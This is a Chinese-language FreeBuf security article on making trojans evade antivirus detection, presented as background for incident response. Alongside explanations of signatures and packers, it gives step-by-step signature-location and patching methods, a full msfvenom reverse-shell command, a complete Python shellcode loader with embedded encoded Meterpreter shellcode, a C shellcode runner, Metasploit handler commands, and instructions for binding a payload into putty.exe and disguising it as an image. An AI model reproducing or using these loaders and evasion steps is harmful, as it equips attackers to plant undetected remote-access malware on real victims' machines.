freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

从后渗透分析应急响应的那些事儿(二):免杀初识篇
2019-05-21 10:44:13

从后渗透分析应急响应的那些事儿(二)免杀初识篇

不知攻,焉知防。初识免杀,借此划重点分析应急响应应注意的免杀木马那些事儿。

1免杀相关定义

1.1木马

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全。

1.2免杀

免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

1.3特征码

特征码主要用来判断某段数据属于哪个计算机字段。病毒特征码,它主要由反病毒公司制作,一般都是被反病毒软件公司确定为只有该病毒才可能会有的一串二进制字符串,而这字符串通常是文件里对 应程式码或汇编指令的地址。杀毒软件会将这一串二进制字符串用某种方法与目标文件或处理程序作对比,从而判定该文件或进程是否感染病毒。

1.4Ring0

计算机中有一个用于控制CPU完成各项功能的命令系统,它叫做“指令系统”,指令系统将指令分为特权指令与普通指令。对于一些危险的指令(即绝大部分特权指令),只允许操作系统及其相关模块使用,而普通的应用程序只能使用那些不会造成灾难的指令(即普通指令)。
Intel的CPU将特权级别分为4层,它们分别是Ring0,Ring1,Ring2与Ring3。Ring0为底层,也就是所谓的“内核层”,它也是操作系统的底层;Ring3为最高层,也就是用户层。

1.5PE文件

在windows系统中,凡是可以直接以二进制形式被系统加载执行的文件都是PE文件,例如.exe/.dll/.sys/.ocx等都遵循PE文件结构的约定,属于可执行文件。PE文件由DOS文件头、DOS加载模块、PE文件头、区段表与区段5部分构成

2 免杀分类

2.1分类一

  • 无源码免杀(二进制免杀),只能通过通过修改asm代码(字节框架代码)/二进制数据(二进制class文件)/其他数据来完成免杀。
  • 有源码免杀,可以通过修改源代码来完成免杀,也可以结合二进制免杀的技术。

2.2分类二

  • 静态文件免杀,被杀毒软件病毒库/云查杀了,也就是文件特征码在病毒库了。免杀方式可能是上面的两种方式,看情况。
  • 动态行为免杀,运行中执行的某些行为被杀毒软件拦截报读。行为免杀如果没有源码就不是很好搞了。

2.3分类三

  • 文件免杀,基于文件的免杀基本上就是破坏原有程序的特征。无论是修改特征码还是加上一段花指令还是加壳,目的就是为了打乱或加密可执行文件内部的数据。

  • 内存免杀,数据进入CPU之前会在内存中处理成可以直接被CPU执行的形式。通过选择扫描内存的形式去查杀木马。将要被执行的程序肯定比未执行程序的威胁更大。再厉害的木马只要能保证它不被执行,它在用户的计算机中最多也就是算是一个垃圾文件,就不会对用户及网络构成任何威胁。

  • 行为免杀,从最早的“文件防火墙”发展到后来的“主动防御”,再到现在的部分“云查杀”,其实都应用了行为查杀技术。常见行为添加服务、创建驱动、释放资源、添加注册表、增加自启动、创建互斥体、遍历全硬盘的文件、远程线程注入、HOOK

3 如何免杀

3.1修改特征码

3.1.1定位特征码

常用的定位木马病毒特征码的工具有三款,一款是CCL,一款是MultiCCL,另一款就是MYCCL。CCL程序出现后,使得特征码修改已经成为了对付杀毒软件的常用手法,但是杀毒软件开始使用多重复合特征码来对付特征码修改就是说只有你同时改掉程序所有的守护特征码此程序才不被杀。CCL这样的定位工具无法直接定位出特征码,要定位复合特征码必须手工划分,而MYCCL是CCL的改进版,可以进行多重特征码的定位,针对360等杀软的反向定位等功能,并实现自动化代码定位和显示。
一款新的特征码定位软件VirTest,采用2分排除法,测试标志C所在文件中的位置,由于被杀的文件可能存在多个类似于ABC这样的连锁条件,所以我们必须要通过一种排除机制,先要找最靠近文件前部的连锁条件,排除掉文件尾部数据,当找到第一个连锁条件后,抹掉引标志C,再恢复尾部数据,然后继续测试另外的连锁条件,直到找到最后一个连锁条件,抹掉后,整个文件免杀了,则说明特征代码被定为完毕了,所以VIRTEST绝对可以精确的定位出所有的复合特征。这比文件分块定位法先进得多,更为科学。
MYCCL定位特征码原理:
假设一段木马程序代码是这样(0代表NULL,X代表程序代码,a、b、c等代表特征码):
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:XXXXXXXXcXXXXXxXXXXX
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:XXXXXXXXXbXXXXXXXXXX
  005h:XXXXXXXXXXXXcXXXXXXX
  当文件同时包含a.b.c三种特征码的时候,杀软就报毒啦。这就是所谓的复合特征码。当然杀软在定义复合特征码的时候可能有好几种组合,好几套特征码。当是复合特征码的时候,在用CCL来定位结果是很困难的。而MyCCL在CCL的基础上又进步了。这里我们手动用MyCCL来生成5个文件。
  File1=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:00000000000000000000
  004h:00000000000000000000
  005h:00000000000000000000
  File2=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:XXXXXXXXcXXXXXxXXXXX
  003h:00000000000000000000
  004h:00000000000000000000
  005h:00000000000000000000
  File3=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:XXXXXXXXcXXXXXxXXXXX
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:00000000000000000000
  005h:00000000000000000000
  File4=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:XXXXXXXXcXXXXXxXXXXX
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:XXXXXXXXXbXXXXXXXXXX
  005h:00000000000000000000
  File5=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:XXXXXXXXcXXXXXxXXXXX
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:XXXXXXXXXbXXXXXXXXXX
  005h:XXXXXXXXXXXXcXXXXXXX
  =========================
  从File2开始就有了abc特征码的组合,File2到File5就被杀了。被杀以后再用MyCCL,进行二次定位,这样我们就知道了特征码c的位置了。然后再把002h那行置0,再生成一次。
  第二次生成5个文件:
  File1=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:00000000000000000000
  004h:00000000000000000000
  005h:00000000000000000000
  File2=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:00000000000000000000
  004h:00000000000000000000
  005h:00000000000000000000
  File3=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:00000000000000000000
  005h:00000000000000000000
  File4=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:XXXXXXXXXbXXXXXXXXXX
  005h:00000000000000000000
  File5=====
  001h:XXXXXaXXXbXXXXXXXXXX
  002h:00000000000000000000
  003h:XXXXXXXXXaXXXXXXXXXX
  004h:XXXXXXXXXbXXXXXXXXXX
  005h:XXXXXXXXXXXXcXXXXXXX
  =========================
  因为002h被我们置0了,这里只有File5有abc特征码了,所以File5被杀,这时另一处c也暴露出来了,这样我们就把所有c特征码都定位出来了。MYCCL解决了CCL定位复合特征码的困难。
  MYCCL具体操作:
定位特征码前我们要首先关闭杀毒软件的实时防护以及自动上传功能,然后把远程程序生成的木马放在其他的盘符不要放在C盘。定位工具也是一样不要放在C盘。不然杀毒软件会检测到然后会进行一系列的干扰。那我们就定位不到真正的特征码了。

首先打开MYCCL,然后打开木马程序,它会自动在木马测试程序文件夹下添加OUTPUT文件夹,用于放置分块的木马样本文件。块数自己定,分块高了电脑会卡,本人一般的定20左右。填充”’默认的是00填充但是现在杀毒软件把用00填充的文件杀的都很死。我们可以用其他的字符填充 AA BB FF这些都是可以的。其他的你不会填默认就行了填好以后点击“生成”。
image.png
如果你分块设置的是20块那么这个目录里面就会有20个文件样本,然后你需要做什么杀毒软件的免杀,你就用哪个杀毒软件去查杀我就以QQ安全管家为例(360杀毒率更高),杀毒软件查杀完成以后会把带毒的样本文件全部删除。
首先点击生成,他会提示你对OUTPUT杀毒,然后点击二次处理。我们生成后用管家进行杀毒,对OUTPUT文件夹扫描后进行立即处理。
image.png
image.png
然后我们在用MYCC进行二次处理。
image.png
一直重复这个动作直到没有病毒为止生成-----查杀-----二次处理-----查杀-----二次处理——》确定特征码。
image.png

3.1.2 修改特征码

确定特征码之后便是修改特征码。两个要点,一是免杀,二是正常运行。

常用的修改工具有,OD,C32ASM,UE,010Editor等等。
常见修改特征码方法如下:
(1)载入c32或者winhex
方法一:修改特征码的十六进制
修改方法:把特征码所对应的十六进制改成数字+1或者减1
举例:载入c32或者winhex 输入跳转OFFSET地址 定位到的特征码在80的0闪烁 可以把0改成1 即81
方法二:大小写
修改方法:特征码所对应的内容是字符串的,大小字互换.
举例:大小写间差20
(2)下面是OD载入的分析
方法三:替换法
修改方法:特征码所对应的汇编指令替换成相同或相似的.
举例:jnz换成JMP.
方法四:顺序调换法
修改方法:特征码对应的指令顺序互换一下.
举例:00851A97 MOV ESI,ECX
00851A98 MOV EDI,0
可以换位00851A97 MOV EDI,0
00851A98 MOV ESI,ECX
方法五:JMP法
修改方法:把特征码移到零区域,然后一个JMP又跳回来执行.
方法六:移位法
修改方法:把定位到函数的特征码复制 然后NOP 找到0区域写入刚NOP代码 然后JMP回到原来NOP的下面一个地址,然后lordpe修改相应函数的地址。

采用较为简单的C32ASM为例,将测试木马文件拖入CS32ASM,选择16进制,然后右键点击跳到,输入确定的特征码。
可以在光标定位的位置直接修改,也可以在右边修改内容。
image.png
也可以右键点击对应汇编模式编辑添加花指令。
image.png

3.2 修改花指令

花指令的修改需要用的汇编知识,现在总结基本汇编知识如下:
cmp a,b 比较a和b大小意思(cmp是英文compare 比较的意思)
mov a,b 把b的值传送给a (mov是英文move 移动的意思)
nop (no operation)意思是什么事都没做(do nothing)常用的修改指令
call 调用子程序
pop 出栈
push 压栈
ADD 加法.
ADC 带进位加法.
INC 加 1
SUB 减法.
SBB 带借位减法.
DEC 减 1
AND 与运算.
OR 或运算.
XOR 异或运算.
NOT 取反.
TEST 测试.
跳的分几种:
je 或jz 若相等则跳
jne或jnz 若不相等则跳
jmp 无条件跳转
jb 若小于则跳
ja 若大于则跳
jg 若大于则跳
jge 若大于等于则跳
jl 若小于则跳
jle 若小于等于则跳

3.3 加壳

很多木马都是加过壳的,而且这些加壳后的木马已经被反病毒公司提取了特征,所以如果黑客们不能将其脱壳,也就无法进行有效的免杀。
壳分类:
•压缩壳
压缩壳的主要目的是压缩应用程序的体积,例如UPX可以将一般的应用程序压缩到原体积的30%左右。
压缩壳并不会对被加壳程序本身做任何修改,而是直至将其换成一种更加节省空间的存储方式。经过压缩壳处理过的程序在真正被CPU执行前是会自动解压缩(解密)的。
•加密壳
加密壳的主要目的是保护原程序不被破解,一般情况下,加密壳会对源程序进行一定的修改,例如代码乱序、代码混淆等。因此经过加密壳处理的程序即便是提交给CPU去执行,源程序的代码也还是发生了改变。
•代码乱序
将本来线性执行的代码分成若干份后颠倒存储位置,再通过跳转指令将其按照正确的顺序连接起来。
这样对于CPU来说其执行的程序逻辑没变,只是多了几条跳转指令。但是这段代码在硬盘上或内存中的组织排列方式却发生了很大的变化。
•代码混淆
代码混淆的本质就是一条指令扩展为若干条指令,例如原本是一个计算“1+1”的代码,但是混淆后就变成了“1+10-9+0-0+1-1”,虽然结果一样,但是代码本身的代码甚至部分逻辑都发生了变化。
•虚拟机保护壳
虚拟机保护壳的关键技术就在于实现了一个软件版本的CPU,被加密的可执行代码不再遵循Intel制定的OPCode标准了,而是执行由虚拟机作者本身制定的非公开的、动态的CPU指令编码解码标准,我们通常称之为TextCode。

4 免杀实战(目前亲测有效)

4.1 远控木马py免杀(文件免杀)

目前仅测试成功针对Windows32位操作系统。
1.在kali下生成一个反弹的msf的python脚本,命令如下:

    msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.133.130  -e x86/shikata_ga_nai -i 11 -f py -o  bk2.py

image.png
2.拷贝出bk2.py到window32系统进行修改,修改如下(buf部分为bk2.py的原有代码,其余是修改增加的代码)

from ctypes import *
import ctypes

buf =  ""
buf += "\xda\xc4\xd9\x74\x24\xf4\x5e\xbd\xf8\xd6\xd4\x3c\x33"
buf += "\xc9\xb1\x99\x83\xee\xfc\x31\x6e\x16\x03\x6e\x16\xe2"
buf += "\x0d\x6e\x2d\xcb\x62\xe8\x17\xdf\xa5\x83\x83\xd4\x08"
buf += "\x5f\x05\xa5\x21\x1c\x78\x3a\x74\x66\x8d\xc0\xca\x91"
buf += "\xfc\x54\xb4\x92\xfe\xa5\x05\x75\x2a\x72\x40\x86\x6c"
buf += "\xf7\x36\x43\x74\xb9\xa9\x2b\xcf\xf9\xf8\x38\xbd\x01"
buf += "\x2a\xdc\x19\x10\x20\xcf\x45\x03\x80\x55\x10\xe5\x83"
buf += "\x59\xe6\x31\x2a\x1a\xfc\xbf\xff\xfa\xfb\xb6\xaf\x7e"
buf += "\x24\xae\x5f\x31\x1c\xc9\x2a\x7e\x4a\x1d\x25\x26\xee"
buf += "\xed\xf3\xf2\x14\xf4\xfc\x01\xe0\x45\x2d\x65\x37\x9d"
buf += "\x4c\x8f\xcf\x3c\xa1\x1d\xac\x3e\xa0\xdc\xef\x73\x00"
buf += "\x09\x9c\x22\xea\xd1\xbc\xbd\xd3\x59\x16\x12\xdb\x1d"
buf += "\x01\x97\x78\x8c\x26\x67\x88\x10\x4f\xa5\x9e\x4e\xf9"
buf += "\x5d\x4b\x16\x46\x92\x12\xe2\x99\x91\x4f\xe0\x36\xf7"
buf += "\xb2\xb4\x52\xcd\x55\xbc\xee\xe7\x8f\xcc\xc9\xf3\xe1"
buf += "\x18\x26\xf3\x9f\x6d\x89\xc0\x10\x75\x04\x10\x22\x6a"
buf += "\x5d\x02\x62\xcc\xf7\xab\x8c\x50\xd6\xd2\xd0\xfd\x44"
buf += "\x03\x8c\xd4\x0b\x9f\x2d\x50\x08\x2a\x80\x82\xd7\xaa"
buf += "\x70\x11\xa7\xcb\xa1\x82\x3b\x82\x4c\x18\x68\x63\x51"
buf += "\x76\x06\x22\x92\xfb\xa6\x53\x22\x47\xd1\xe4\x60\xa4"
buf += "\x08\xac\xf0\x7a\x01\x3a\x73\x16\x6b\x2d\x74\x94\x00"
buf += "\x05\xc7\x2c\x04\x5d\x74\x92\xb9\x2e\x78\x1b\x1b\xe9"
buf += "\xd6\x66\x5d\x20\x4c\x21\x1b\x83\xf7\xa7\x87\x2f\xf0"
buf += "\x44\x21\x6c\x94\x21\x21\x5b\xe8\x88\x94\x06\xfa\x14"
buf += "\x30\x12\xf3\x18\x57\x58\xe9\x0b\x67\x70\xff\x6d\x01"
buf += "\x1d\xd5\x33\x24\x8c\xca\x05\xcf\x71\x08\x75\xc9\x65"
buf += "\x27\x8e\xc4\x39\xc8\x39\x64\x38\xf9\x67\x85\x21\xe8"
buf += "\x68\xb1\xbe\x40\x5c\x77\x95\x2a\x5f\x38\xab\x34\x76"
buf += "\x0d\x83\xe3\x32\xdf\xc0\xe3\x3f\x9e\xd1\xa4\x7b\xfd"
buf += "\xcb\xa3\xc3\x82\xcd\x24\x36\xb0\x4c\x67\x7c\x6c\xb4"
buf += "\x74\x93\x46\x57\x77\x9e\x87\x00\x66\xad\xfe\x6b\x1b"
buf += "\x8f\x54\x9d\x0c\xcd\xd2\x63\x72\x2a\xf3\xaa\x56\x86"
buf += "\x90\xa0\x0d\x6c\xc6\x31\x0b\xa4\x11\xfd\x2d\xba\x42"
buf += "\xb8\x95\xbc\x49\xf1\x73\x99\x4b\x4b\xa3\x60\x9b\x70"
buf += "\x30\x45\xa5\x68\xa7\x4d\x28\x0a\x52\x7c\xef\x49\x53"
buf += "\x87\x07\x34\x01\x44\x57\x82\x9e\x3d\x0d\xd9\xf5\x45"
buf += "\x16\xd7\x02\xfb\xb0\xe0\x04\xde\x51\xfa\xee\x64\x7f"
buf += "\xde\xa9\x07\xad\x47\xbf\xec\xe8\x06\xf9\xea\x7d\x57"
buf += "\x86\x06\xdb\x92\xe4\x41\xba\xef\xab\x84\x35\xac\x05"
buf += "\x5d\xf0\x0a\xbc\xa8\x41\xdf\x65\x8f\x78\xa1\x75\xff"
buf += "\xfa\xdf\x5b\x85\x19\xad\x28\x4a\x29\x57\x33\x54\xed"
buf += "\xb1\xf6\xe9\x10\xee\x98\x3a\xf2\x2d\x23\x93\x63\xc0"
buf += "\x3c\x99\x20\x19\x98\x9a\x90\x54\x60\x5e\x42\x9b\xea"
buf += "\x3d\xe2\xc9\x3a\x17\xe9\x44\x68\x2f\x7e\xe2\x2d\xcf"
buf += "\x23\x7a\xf0\xe8\x18\x4b\xb0\x5b\xd3\x76\x06\x4e\x39"
buf += "\x91\x8b\x77\xee\x4e\xc9\xff\xdd\x46\xac\x0f\x7f\x56"
buf += "\xc0\x3a\x88\x04\x6d\xd7\x72\x41\xd2\x20\xbe\x53\x8f"
buf += "\x16\x05\x58\xda\x2c\x60\x11\x27\x76\x04\x72\xb5\x66"
buf += "\x09\xbc\xf5\x99\xcc\xdd\xc8\xf9\xe9\xe0\x34\x8e\x0c"
buf += "\x78"

#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
   buf = c_char_p(buffer)
   size = len(buffer)
   addr = libc.valloc(size)
   addr = c_void_p(addr)
   if 0 == addr: 
       raise Exception("Failed to allocate memory")
   memmove(addr, buf, size)
   if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
       raise Exception("Failed to set protection on buffer")
   return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
      if 666==666:
             ctypes.windll.user32.ShowWindow(whnd, 0)   
             ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                       ctypes.c_int(len(shellcode)),
                                         ctypes.c_int(0x3000),
                                         ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                    buf,
                                    ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
print "Code By Luan"
shell()

3.在windowsx86上安装支持python的环境,下载pywin32 解压运行,一直点下一步就可以了
4.然后下载支持将python生成exe的软件pyinstall ,解压然后执行以下命令:

    D:\miansha\pyinstaller-2.0>python PyInstaller.py --console --onefile  bk2.py

注意这里不要有中文路径,否则会出错
image.png

5.执行命令后会在d:\pyinstaller-2.0\bk\dist目录生成bk.exe
image.png

6.这里我将在windowsx86上安装最新的360杀毒软件,进行查杀测试
image.png
image.png
7.然后在kali下启动msf,然后执行以下命令:

use exploit/multi/handler

set lhost 192.168.133.130

set lport 443

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterprer 出来:
image.png

4.2远控木马C免杀(文件免杀)

  1. 同样运用命令生成c文件:
msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ lhost=192.168.133.130  lport=4444   -f c

上述命令生成在之前的基础上生成基于c语言格式的shellcode,通过e参数指定编码方式,i参数指定编码次数,b参数去除指定代码,一般是空代码或者错误代码,-f指定生成格式。
image.png
将以上生成的shellcode使用vc++6.0编译。模式如下

    unsigned char buf[] = 
    "免杀C程序";
    main()
    {
    ( (void(*)(void))&buf)();
    }

image.png

然后运行VC6.0编译成免杀.cpp之后,在执行免杀.exe,在免杀工程文件夹的Debug文件夹发现 免杀.exe.
image.png
image.png
我们的攻击msf设置如下,当攻击者出发免杀.exe时,即可反弹meterpreter。
image.png
免杀效果如下:
image.png

4.3远控木马捆绑免杀(文件免杀、加壳免杀)

我们使用kali下shellter工具,可以对工具进行捆绑。
首先我们在root下拷贝Windows工具putty.exe,然后运行shellter。
image.png
界面 A 代表自动 M 是高级的用法,也应该是用M来做到免杀吧,自己还没有试。 H 也就是帮助了,PE这个就是你要捆绑的文件目录。
image.png
Y启动藏匿模式。部分payload解释如下:
Meterpreter_Reverse_TCP 这种是基于TCP的反向链接,换句话说,谁出发了这个模块,她会吧这个触发者的shell发送给指定的人
Meterpreter_Reverse_HTTP 这个是基于 http网页传输的反向链接 和上面大同小异,只不过 上面的基于TCP链接,这个是用GET 或者 POST进行发送接收
Meterpreter_Reverse_HTTPS 这个 和上面的也差不多,只不过这个的数据被加密,也是基于http的传输方式
Meterpreter_Bind_TCP 这个就不同了,这个是正向的链接,需要攻击者知道,是谁出发的这个模块,比较类似后门程序,
Shell_Reverse_TCP 和上面相同,也是反向链接,只不过可以用shell直接接收会话。
image.png
最终成功捆绑,在root文件下覆盖原文件生成木马文件,原文件备份与shellter-backups。
image.png
然后拷贝到Windows操作系统,进行杀毒测试,发现仅能躲过QQ安全挂架的查杀,并不能免杀360杀毒和360安全卫士,采用kali下的upx进行压缩加壳测试也失败,测试双重捆绑同样未免杀,很遗憾。QQ管家免杀反弹shell如下图。
image.png
image.png

5免杀变形

既然已经制作免杀exe远控木马,但是现在广大人民群众网络安全防范意识增强,一般不会点开来历不明的exe文件,那我们就略施小计给我们免杀木马穿件花衣裳吧,主要工具Resource_Hacker 和Unitrix (病毒)把exe文件编程jpg样子,具体操作Tide专栏的文章已作出详细操作链接如下:后门木马变形计

本篇后渗透之免杀到此结束,之后会陆续介绍黑客getshell之后如何进行权限维持,如何进行内网渗透,然后总结划重点,从应急的角度分析黑客的入侵行为。
文章参考链接,感谢各位大佬的倾情奉献:
https://www.freebuf.com/column/200685.html
https://www.freebuf.com/column/200829.html
https://www.freebuf.com/column/200829.html


关注我们

Tide安全团队正式成立于2019年1月,是以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号:

ewm.png



# 木马 # 免杀 # 应急响应
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者